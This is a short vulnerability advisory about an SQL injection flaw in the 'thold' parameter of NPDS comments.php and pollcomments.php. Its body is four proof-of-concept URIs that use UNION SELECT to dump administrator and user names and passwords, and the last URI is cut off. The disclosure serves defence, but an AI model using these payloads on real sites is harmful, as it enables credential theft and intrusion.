NPDS THOLD Parameter SQL Injection Vulnerability

NPDS THOLD Parameter SQL Injection Vulnerability

No exploit is required.

The following proof of concept URIs are available:

http://www.example.com/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors

http://www.example.com/npds/comments.php?thold =0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users

http://www.example.com/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM %20authors

http://www.example.com/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20u